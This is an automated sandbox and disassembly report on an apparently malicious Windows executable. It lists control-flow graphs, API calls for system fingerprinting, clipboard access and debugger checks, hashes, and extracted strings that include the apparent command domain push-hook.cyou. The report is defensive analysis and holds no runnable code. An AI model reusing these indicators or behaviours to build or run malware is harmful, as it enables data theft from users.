40ce80 CoInitializeEx 14146->14150 14154 43f460 14151->14154 14153 43deb5 FreeLibrary 14153->14138 14155 43f469 14154->14155 14155->14153 14231 40ceb3 CoInitializeSecurity

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 439030-439089 1 439090-4390c6 0->1 1->1 2 4390c8-4390e4 1->2 4 4390f1-43913f CoCreateInstance 2->4 5 4390e6 2->5 6 439145-439177 4->6 7 43968c-4396b8 call 43f9a0 GetVolumeInformationW 4->7 5->4 9 439180-4391af 6->9 12 4396ba 7->12 13 4396bc-4396df call 420650 7->13 9->9 11 4391b1-4391e4 SysAllocString 9->11 17 439674-439688 SysFreeString 11->17 18 4391ea-439204 CoSetProxyBlanket 11->18 12->13 19 4396e0-4396e8 13->19 17->7 20 43966a-439670 18->20 21 43920a-439225 18->21 19->19 22 4396ea-4396ec 19->22 20->17 23 439230-439262 21->23 25 4396fe-43972d call 420650 22->25 26 4396ee-4396fb call 408330 22->26 23->23 27 439264-4392df SysAllocString 23->27 34 439730-439738 25->34 26->25 29 4392e0-43930b 27->29 29->29 32 43930d-43933d SysAllocString 29->32 37 439343-439365 32->37 38 439658-439668 SysFreeString * 2 32->38 34->34 36 43973a-43973c 34->36 39 43974e-43977d call 420650 36->39 40 43973e-43974b call 408330 36->40 47 43964b-439655 37->47 48 43936b-43936e 37->48 38->20 46 439780-439788 39->46 40->39 46->46 49 43978a-43978c 46->49 47->38 48->47 50 439374-439379 48->50 51 43979e-4397cb call 420650 49->51 52 43978e-43979b call 408330 49->52 50->47 54 43937f-4393cf VariantInit 50->54 61 4397d0-4397d8 51->61 52->51 55 4393d0-439416 54->55 55->55 58 439418-43942d 55->58 62 439431-439433 58->62 61->61 63 4397da-4397dc 61->63 64 439636-439647 VariantClear 62->64 65 439439-43943f 62->65 66 4397ee-4397f5 63->66 67 4397de-4397eb call 408330 63->67 64->47 65->64 68 439445-439452 65->68 67->66 71 439454-439459 68->71 72 43948d 68->72 74 43946c-439470 71->74 75 43948f-4394b7 call 4082b0 72->75 77 439472-43947b 74->77 78 439460 74->78 83 4395e8-4395f9 75->83 84 4394bd-4394cb 75->84 81 439482-439486 77->81 82 43947d-439480 77->82 80 439461-43946a 78->80 80->74 80->75 81->80 85 439488-43948b 81->85 82->80 87 439600-43960c 83->87 88 4395fb 83->88 84->83 86 4394d1-4394d5 84->86 85->80 89 4394e0-4394ea 86->89 90 439613-439633 call 4082e0 call 4082c0 87->90 91 43960e 87->91 88->87 92 439500-439506 89->92 93 4394ec-4394f1 89->93 90->64 91->90 96 439525-439533 92->96 97 439508-43950b 92->97 95 439590-439596 93->95 103 439598-43959e 95->103 100 439535-439538 96->100 101 4395aa-4395b3 96->101 97->96 99 43950d-439523 97->99 99->95 100->101 106 43953a-439581 100->106 104 4395b5-4395b7 101->104 105 4395b9-4395bc 101->105 103->83 108 4395a0-4395a2 103->108 104->103 109 4395e4-4395e6 105->109 110 4395be-4395e2 105->110 106->95 108->89 111 4395a8 108->111 109->95 110->95 111->83
                                                                    APIs
                                                                    • CoCreateInstance.OLE32(00443678,00000000,00000001,00443668,00000000), ref: 00439137
                                                                    • SysAllocString.OLEAUT32(13C511C2), ref: 004391B6
                                                                    • CoSetProxyBlanket.COMBASE(0000FDFC,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004391FC
                                                                    • SysAllocString.OLEAUT32(13C511C2), ref: 00439265
                                                                    • SysAllocString.OLEAUT32(13C511C2), ref: 0043930E
                                                                    • VariantInit.OLEAUT32(?), ref: 00439384
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026698409.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                    • String ID: =3$C$E!q#$E!q#$Lgfe$\$IK
                                                                    • API String ID: 65563702-4011188741
                                                                    • Opcode ID: 74e590896f5bfba1a4c45a56f71c19cb345f99e738f7e67b9f47388845338ca8
                                                                    • Instruction ID: 9251e3c66033709fe23b4e1ee742b75be419a17e7591596e0cc195c23d498240
                                                                    • Opcode Fuzzy Hash: 74e590896f5bfba1a4c45a56f71c19cb345f99e738f7e67b9f47388845338ca8
                                                                    • Instruction Fuzzy Hash: 542233B2908301ABE324CF20CC41B5BBBA5EF99714F148A1DF4959B3C1D7B8D905CB9A

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 248 40cf05-40cf12 249 40cf20-40cf5c 248->249 249->249 250 40cf5e-40cfa5 call 408930 call 439030 249->250 255 40cfb0-40cffc 250->255 255->255 256 40cffe-40d06b 255->256 257 40d070-40d097 256->257 257->257 258 40d099-40d0aa 257->258 259 40d0cb-40d0d3 258->259 260 40d0ac-40d0b3 258->260 262 40d0d5-40d0d6 259->262 263 40d0eb-40d0f8 259->263 261 40d0c0-40d0c9 260->261 261->259 261->261 264 40d0e0-40d0e9 262->264 265 40d0fa-40d101 263->265 266 40d11b-40d123 263->266 264->263 264->264 267 40d110-40d119 265->267 268 40d125-40d126 266->268 269 40d13b-40d266 266->269 267->266 267->267 270 40d130-40d139 268->270 271 40d270-40d2ce 269->271 270->269 270->270 271->271 272 40d2d0-40d2ff 271->272 273 40d300-40d31a 272->273 273->273 274 40d31c-40d36b call 40b960 273->274 277 40d370-40d3ac 274->277 277->277 278 40d3ae-40d3c5 call 408930 call 439030 277->278 282 40d3ca-40d3eb 278->282 283 40d3f0-40d43c 282->283 283->283 284 40d43e-40d4ab 283->284 285 40d4b0-40d4d7 284->285 285->285 286 40d4d9-40d4ea 285->286 287 40d4fb-40d503 286->287 288 40d4ec-40d4ef 286->288 290 40d505-40d506 287->290 291 40d51b-40d528 287->291 289 40d4f0-40d4f9 288->289 289->287 289->289 292 40d510-40d519 290->292 293 40d52a-40d531 291->293 294 40d54b-40d557 291->294 292->291 292->292 295 40d540-40d549 293->295 296 40d559-40d55a 294->296 297 40d56b-40d696 294->297 295->294 295->295 298 40d560-40d569 296->298 299 40d6a0-40d6fe 297->299 298->297 298->298 299->299 300 40d700-40d72f 299->300 301 40d730-40d74a 300->301 301->301 302 40d74c-40d791 call 40b960 301->302
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026698409.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ()$+S7U$,_"Q$0C%E$7W"i$97D231997013CEACD7CBBD6DF28D3732$;[*]$<KuM$N3F5$S7HI$push-hook.cyou$y?O1$c]e$gy
                                                                    • API String ID: 0-942567934
                                                                    • Opcode ID: ddd47fdf7f98754443faa8adf7d919d97b52bdec52d9a692a706503d3d5cf8a3
                                                                    • Instruction ID: 95352b80e5630bce15aed1fbf35dc3a728fde8e5f260dc95f2cafd28bad86ac5
                                                                    • Opcode Fuzzy Hash: ddd47fdf7f98754443faa8adf7d919d97b52bdec52d9a692a706503d3d5cf8a3
                                                                    • Instruction Fuzzy Hash: E5121FB19483C18ED3348F65C495BEFBBE1EBD2304F18896DC4DA6B256C774090ACB96

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 305 4098f0-4098fe 306 409904-40997f call 4061a0 call 4082b0 305->306 307 409e75 305->307 313 409980-4099b5 306->313 308 409e77-409e83 307->308 313->313 314 4099b7-4099df call 409210 313->314 317 4099e0-409a5b 314->317 317->317 318 409a5d-409a99 call 409210 317->318 321 409aa0-409ae1 318->321 321->321 322 409ae3-409b2f call 409210 321->322 325 409b30-409b56 322->325 325->325 326 409b58-409b6f 325->326 327 409b70-409bdc 326->327 327->327 328 409bde-409c0e call 409210 327->328 331 409c10-409c6e 328->331 331->331 332 409c70-409d4b call 4094d0 331->332 335 409d50-409d7e 332->335 335->335 336 409d80-409d88 335->336 337 409db1-409dbc 336->337 338 409d8a-409d92 336->338 340 409de1-409e0b 337->340 341 409dbe-409dc1 337->341 339 409da0-409daf 338->339 339->337 339->339 343 409e10-409e36 340->343 342 409dd0-409ddf 341->342 342->340 342->342 343->343 344 409e38-409e58 call 40c570 call 4082c0 343->344 348 409e5d-409e73 344->348 348->308
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026698409.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 97D231997013CEACD7CBBD6DF28D3732$DG$Ohs,$chs,$fhnf$fhnf$xy$su${}
                                                                    • API String ID: 0-1022774131
                                                                    • Opcode ID: 3b2e2c17e06f68a588a8714d09a9d05c1357827c6804f6b0a1eae72e70e9dce4
                                                                    • Instruction ID: c4e227adad71c4174b748ad9c04c569e7477bd6730e0a3dc5e2a244df201f6bc
                                                                    • Opcode Fuzzy Hash: 3b2e2c17e06f68a588a8714d09a9d05c1357827c6804f6b0a1eae72e70e9dce4
                                                                    • Instruction Fuzzy Hash: 9CE14A72A483508BD328CF35C85176BBBE2ABD1314F198A3DE5E59B395D738C805CB86

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 349 40e35b-40e393 call 434600 call 4098f0 CoUninitialize 354 40e3a0-40e3d2 349->354 354->354 355 40e3d4-40e3ef 354->355 356 40e3f0-40e428 355->356 356->356 357 40e42a-40e499 356->357 358 40e4a0-40e4ba 357->358 358->358 359 40e4bc-40e4cd 358->359 360 40e4eb-40e4f3 359->360 361 40e4cf-40e4df 359->361 362 40e4f5-40e4f6 360->362 363 40e50b-40e515 360->363 364 40e4e0-40e4e9 361->364 365 40e500-40e509 362->365 366 40e517-40e51b 363->366 367 40e52b-40e533 363->367 364->360 364->364 365->363 365->365 368 40e520-40e529 366->368 369 40e535-40e536 367->369 370 40e54b-40e555 367->370 368->367 368->368 371 40e540-40e549 369->371 372 40e557-40e55b 370->372 373 40e56b-40e577 370->373 371->370 371->371 374 40e560-40e569 372->374 375 40e591-40e6b3 373->375 376 40e579-40e57b 373->376 374->373 374->374 377 40e6c0-40e6da 375->377 378 40e580-40e58d 376->378 377->377 379 40e6dc-40e70f 377->379 378->378 380 40e58f 378->380 381 40e710-40e72b 379->381 380->375 381->381 382 40e72d-40e77d call 40b960 381->382
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026698409.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: Uninitialize
                                                                    • String ID: Lk$U\$Zb$push-hook.cyou$r
                                                                    • API String ID: 3861434553-2470801865
                                                                    • Opcode ID: 43aa4fe2daabb56ee0c0189276c116c532aecf1b25a6e7641c8b17845f3c9312
                                                                    • Instruction ID: ef410df6409a163283a486a480043fce37e142e129954a82ac19f0ffe715bc95
                                                                    • Opcode Fuzzy Hash: 43aa4fe2daabb56ee0c0189276c116c532aecf1b25a6e7641c8b17845f3c9312
                                                                    • Instruction Fuzzy Hash: C7A1BEB010C3D18AD7758F26C8947EFBBE1AB93308F188DADD0E95B282D73941058B5B

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 385 4089a0-4089b1 call 43cb70 388 408cb3-408cb5 ExitProcess 385->388 389 4089b7-4089cf SHGetSpecialFolderPathW call 436620 385->389 392 4089d5-4089fb GetCurrentThreadId GetCurrentProcessId 389->392 393 408cae call 43deb0 389->393 395 408a01-408bda GetForegroundWindow 392->395 396 4089fd-4089ff 392->396 393->388 397 408be0-408c50 395->397 398 408c8a-408ca2 call 409ed0 395->398 396->395 399 408c52-408c54 397->399 400 408c56-408c88 397->400 398->393 403 408ca4 call 40ce80 398->403 399->400 400->398 405 408ca9 call 40b930 403->405 405->393
                                                                    APIs
                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004089C2
                                                                    • GetCurrentThreadId.KERNEL32 ref: 004089D5
                                                                    • GetCurrentProcessId.KERNEL32 ref: 004089DD
                                                                    • GetForegroundWindow.USER32 ref: 00408BD2
                                                                    • ExitProcess.KERNEL32 ref: 00408CB5
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026698409.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                    • String ID:
                                                                    • API String ID: 4063528623-0
                                                                    • Opcode ID: 448402f8edc22f0c169554d7cdd299670e5b3afa010ca0547ce2b46543dcc2db
                                                                    • Instruction ID: 8cf386439752addaba4cdd5a2328998a91882dbaf7756ccb1846ca93dac1a1d9
                                                                    • Opcode Fuzzy Hash: 448402f8edc22f0c169554d7cdd299670e5b3afa010ca0547ce2b46543dcc2db
                                                                    • Instruction Fuzzy Hash: CB710677B547044BD708DFBADD8235AFAD2ABC8714F09D43EA885D7390EA789C044689
                                                                    APIs
                                                                    • LdrInitializeThunk.NTDLL(0043BA46,?,00000010,00000005,00000000,?,00000000,?,?,00419158,?,?,004119B4), ref: 0043DF9E
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026698409.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                    • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                    • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                    • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026698409.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: efg`
                                                                    • API String ID: 2994545307-115929991
                                                                    • Opcode ID: 1c238176e3fed0a5ff6a15ad099c0f9c6ea10de71e79a94e61b86f65c1e505ed
                                                                    • Instruction ID: ecaf0a4083f3a71b7ac416040caddeb43fa24dcaae48abcd9bbbcdc9a5ac4079
                                                                    • Opcode Fuzzy Hash: 1c238176e3fed0a5ff6a15ad099c0f9c6ea10de71e79a94e61b86f65c1e505ed
                                                                    • Instruction Fuzzy Hash: BD513876A047505BD720EB229C827AF7252AFD5308F15483DE98977382DF386A1282DF
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026698409.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: e155f24c94506abb776baca9464a271ad98091412da28c88d531229bcc753791
                                                                    • Instruction ID: bccc040de558ef894b8f721561d0a7d571ef22008b7c5a710cb7038942829d4d
                                                                    • Opcode Fuzzy Hash: e155f24c94506abb776baca9464a271ad98091412da28c88d531229bcc753791
                                                                    • Instruction Fuzzy Hash: E7514976A087108BD720AF259C4072BB7A2EFDA720F29E63DDAD567351D3359C0287C9

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 703 43ded0-43dee3 704 43deea-43def1 703->704 705 43df49-43df52 call 43b860 703->705 706 43def8-43df05 703->706 707 43df3e-43df47 call 43b7e0 703->707 704->705 704->706 714 43df54 705->714 708 43df10-43df27 706->708 715 43df57-43df5a 707->715 708->708 711 43df29-43df3c RtlReAllocateHeap 708->711 711->714 714->715
                                                                    APIs
                                                                    • RtlReAllocateHeap.NTDLL(?,00000000,00000000,00000000,00000001,?,00000000,00000000,0040B5FE,00000000,00000001), ref: 0043DF36
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026698409.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 95acdc8339484e663681bcb12902f04beb88cdf387219ed12db2102eace9dda6
                                                                    • Instruction ID: cb6f0903ee34e7aaa3abfaba356f2a2918ae25efb13eb98352585469c15522a7
                                                                    • Opcode Fuzzy Hash: 95acdc8339484e663681bcb12902f04beb88cdf387219ed12db2102eace9dda6
                                                                    • Instruction Fuzzy Hash: 1F017B76D082009BD3181B21ACA2AAB7B68DFDB354F16143DE24387640C62C4807C6EA

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 716 43b7e0-43b7ff 717 43b800-43b83d 716->717 717->717 718 43b83f-43b85b RtlAllocateHeap 717->718
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0043B84E
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026698409.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: e673116cc8e36a6bb49cbabe2cdf620d6a173cef19be1431a2d1bf83e7de0cdf
                                                                    • Instruction ID: 55a697b3b7f38dfeef0d40990279f07795ac9d6f77ef781571bf68e037f10c61
                                                                    • Opcode Fuzzy Hash: e673116cc8e36a6bb49cbabe2cdf620d6a173cef19be1431a2d1bf83e7de0cdf
                                                                    • Instruction Fuzzy Hash: AD017633A457080BC300AE7CDC9465ABB96EFD9224F2A063DE5D4873D1DA31990A8295
                                                                    APIs
                                                                    • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CE93
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026698409.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: Initialize
                                                                    • String ID:
                                                                    • API String ID: 2538663250-0
                                                                    • Opcode ID: d70732dda82fda017582911898bf26c0b6c4b0c26e2d0fdaf457f5c9be9936b5
                                                                    • Instruction ID: 65ec1658cf0ed6a28564d450adfe5aa36fc4203d467fc7b256d59c78d50b7f16
                                                                    • Opcode Fuzzy Hash: d70732dda82fda017582911898bf26c0b6c4b0c26e2d0fdaf457f5c9be9936b5
                                                                    • Instruction Fuzzy Hash: D8D0A7346502447BE254F71CEC07F17366D8743726F44423AF662CA1D2D951A910C56A
                                                                    APIs
                                                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CEC5
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026698409.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeSecurity
                                                                    • String ID:
                                                                    • API String ID: 640775948-0
                                                                    • Opcode ID: 06a3d9f6b122735c26e726116e1d41753c139dc615071a83ad1d0583a22b387d
                                                                    • Instruction ID: cf94df1d760ae56c019c2728adca80f508d348269e2314f8c78ae93ac2cc27ae
                                                                    • Opcode Fuzzy Hash: 06a3d9f6b122735c26e726116e1d41753c139dc615071a83ad1d0583a22b387d
                                                                    • Instruction Fuzzy Hash: C2D0C9343D8351BBFAA48B08AC13F5032559707F2AF310228B322FE6E1C9E07141860D
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026698409.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                    • String ID: <$F$G$]$c
                                                                    • API String ID: 2832541153-1818401840
                                                                    • Opcode ID: 38890e0a40a784a9e7e980c3d43740566ea94a1ec1f8cb9bac60998e76c15ca0
                                                                    • Instruction ID: 7e34b2cb0d45b88925ede279eb1f96e1ea01dda7cf2764298d89eb53cb338a03
                                                                    • Opcode Fuzzy Hash: 38890e0a40a784a9e7e980c3d43740566ea94a1ec1f8cb9bac60998e76c15ca0
                                                                    • Instruction Fuzzy Hash: DC41B07180C7819FD300AF38948835EBFE0AB96324F045E2EE5D9863D2C6799549C797
                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 000BA470
                                                                    • IsDebuggerPresent.KERNEL32 ref: 000BA53C
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000BA55C
                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 000BA566
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026614679.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000002.00000002.2026598764.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026634139.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026648015.00000000000D0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026660121.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026672376.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                    • String ID:
                                                                    • API String ID: 254469556-0
                                                                    • Opcode ID: 701aef890f380427478c142f70fcf8dd48a9ae7cc6a2cfb2897b7bac9242a568
                                                                    • Instruction ID: f855f873936c48a0a8376015fa9fe22405f3e5455c827eebb724938ce03385be
                                                                    • Opcode Fuzzy Hash: 701aef890f380427478c142f70fcf8dd48a9ae7cc6a2cfb2897b7bac9242a568
                                                                    • Instruction Fuzzy Hash: 1B311875D0121C9BDB20DFA4D989BCDBBF8AF08304F1040AAE50CAB251EB759B85CF45
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026698409.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: +2/?$=79$BBSH$GZE^
                                                                    • API String ID: 0-3392023846
                                                                    • Opcode ID: 4a9b9554aeccc7118d7c71ecac64a319dc115968925317a1cb91039d54e804cb
                                                                    • Instruction ID: c1f6e68bd240d7d39793b4bc48398cba869a69635bf852959f2adde139d26bb4
                                                                    • Opcode Fuzzy Hash: 4a9b9554aeccc7118d7c71ecac64a319dc115968925317a1cb91039d54e804cb
                                                                    • Instruction Fuzzy Hash: E8520170604B518FC735CF29C890727BBE2BF56314F548A6ED4E68BBA2C739A406CB54
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026698409.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @A$lPLN$svfZ$IK
                                                                    • API String ID: 0-1806543684
                                                                    • Opcode ID: 82b8c9b0b0d0b0e388dee64b631462bfb0939d2e875c8b5a40fecc7ac5658aba
                                                                    • Instruction ID: bec2a7d6163232522d4dd9ce5ef8f9438e202c53104cbe0a23bc38ae9935645b
                                                                    • Opcode Fuzzy Hash: 82b8c9b0b0d0b0e388dee64b631462bfb0939d2e875c8b5a40fecc7ac5658aba
                                                                    • Instruction Fuzzy Hash: AEC1187164C3848BD3148E6584A136FBBE2EBC2740F18C93DE4E55B381D7798C0A9B8A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026698409.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @J$KP$VD$raB
                                                                    • API String ID: 0-1134722806
                                                                    • Opcode ID: 228a0c7c24de460051bea7ad6d1c9bc5878c86792c51d749f83766299ae7dd4a
                                                                    • Instruction ID: db9214028bf4580cd1c873f3a34e9259cba1abe3a371962080498dafbcf198cf
                                                                    • Opcode Fuzzy Hash: 228a0c7c24de460051bea7ad6d1c9bc5878c86792c51d749f83766299ae7dd4a
                                                                    • Instruction Fuzzy Hash: 6A919676704B01AFE720CF64DC81BABBBB1FB82304F54452DE5959B781C378A816CB96
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026698409.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PQ$A_$IG
                                                                    • API String ID: 0-2179527320
                                                                    • Opcode ID: 87f178b092da160a7b0e03a4e1fdad8c491404ee0c8813f4c1ba4b67aab2772a
                                                                    • Instruction ID: ef60202bf7eced3403686b2951891c2fb2126a04afed55a681abd0c637390f11
                                                                    • Opcode Fuzzy Hash: 87f178b092da160a7b0e03a4e1fdad8c491404ee0c8813f4c1ba4b67aab2772a
                                                                    • Instruction Fuzzy Hash: 9A41BDB440C341CBC704CF21D89266BB7F1FF96758F249A2DE0C19B692D7388546CB4A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026698409.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: f$
                                                                    • API String ID: 2994545307-508322865
                                                                    • Opcode ID: 2029a2ef19b17bb19bd05767a51e3f201d60a351b6ba135d9f1406ea0ad4d3a3
                                                                    • Instruction ID: d6718dec7c24f7d12ea8c4c9f84381fa8efdffbfccbdfe4ccf543c4645d0ac99
                                                                    • Opcode Fuzzy Hash: 2029a2ef19b17bb19bd05767a51e3f201d60a351b6ba135d9f1406ea0ad4d3a3
                                                                    • Instruction Fuzzy Hash: B31206746083419FD714CF28C8D0A2BBBE1EBC9328F149A6EE59597392C335DC42CB5A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026698409.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: efg`$efg`
                                                                    • API String ID: 0-3010568471
                                                                    • Opcode ID: 352b08fbeaecad47c87ebdc77db5c47733c3dd721402161c964e13d0f6bc609a
                                                                    • Instruction ID: 0e5240c73f145a77d08930e0c315551f0ba4186630a5d0e5ad9076503220d70f
                                                                    • Opcode Fuzzy Hash: 352b08fbeaecad47c87ebdc77db5c47733c3dd721402161c964e13d0f6bc609a
                                                                    • Instruction Fuzzy Hash: 4631D232A183118BD328DF62C69165FB392ABE4304F1A483ED9C637291CE349D06C3DA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026698409.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: st@
                                                                    • API String ID: 0-3741395493
                                                                    • Opcode ID: 7fb3fbb3ca2ac507b0747a3a3d3554258d5ace5a288527db04dd042f0f60e3c9
